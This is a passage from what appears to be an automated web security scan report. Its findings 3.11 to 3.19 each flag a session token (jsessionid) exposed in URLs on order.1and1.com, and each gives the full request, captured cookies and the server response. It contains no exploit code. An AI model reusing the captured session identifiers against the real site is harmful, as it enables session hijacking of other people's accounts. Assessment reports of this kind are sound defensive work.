Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:45:52 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=cY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDovNmZvNSgpJSQpJiMmISQlHh8=; Expires=Fri, 07-Apr-2079 21:59:59 GMT; Path=/
ETag: 649375030d8d5b092e64c0990c7227c7
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17430


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=FeatureCommunicationToolsChat&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.home" rel="button-hd-nav-home">Home</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=FeatureCommunicationToolsChat&amp;page=switch&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=ngh" rel="redirectlink-ngh">
MyBusiness Site
</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.server" rel="button-hd-nav-server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.tab.packageselection" rel="button-hd-tab-packageselection"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.tab.chooseadomain" rel="button-hd-tab-chooseadomain"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/eshopupselling;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.tab.packageselection" rel="button-hd-tab-packageselection"><span>
...[SNIP]...
<li style="float:right;"><a class="auswahl" href="/xml/order/costs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.tab.yourcart" rel="button-hd-tab-yourcart" title="Ihre Auswahl im &Uuml;berblick (Warenkorb)"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=FeatureCommunicationToolsChat&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...

3.11. http://order.1and1.com/xml/order/FeatureCommunicationToolsChat  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureCommunicationToolsChat

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureCommunicationToolsChat;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:45:52 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=cY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDovNmZvNSgpJSQpJiMmISQlHh8=; Expires=Fri, 07-Apr-2079 21:59:59 GMT; Path=/
ETag: 649375030d8d5b092e64c0990c7227c7
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17430


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

3.12. http://order.1and1.com/xml/order/FeatureCommunicationToolsDialogue  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureCommunicationToolsDialogue

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureCommunicationToolsDialogue;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:46:00 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureCommunicationToolsDialogue?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.13. http://order.1and1.com/xml/order/FeatureCommunicationToolsMerchandise  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureCommunicationToolsMerchandise

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureCommunicationToolsMerchandise;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:42:48 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureCommunicationToolsMerchandise?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.14. http://order.1and1.com/xml/order/FeatureCommunicationToolsNewsletter  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureCommunicationToolsNewsletter

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureCommunicationToolsNewsletter;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:45:33 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureCommunicationToolsNewsletter?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.15. http://order.1and1.com/xml/order/FeatureControlCenter  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureControlCenter

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureControlCenter;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:39:53 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureControlCenter?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.16. http://order.1and1.com/xml/order/FeatureDatabaseAccess  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDatabaseAccess

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureDatabaseAccess;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:40:22 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureDatabaseAccess?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.17. http://order.1and1.com/xml/order/FeatureDatabaseDatabase  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDatabaseDatabase

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureDatabaseDatabase;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:40:13 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureDatabaseDatabase?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.18. http://order.1and1.com/xml/order/FeatureDatabaseMssql  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDatabaseMssql

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureDatabaseMssql;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:40:40 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureDatabaseMssql?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.19. http://order.1and1.com/xml/order/FeatureDomainDns  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDomainDns

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureDomainDns;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:39:46 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
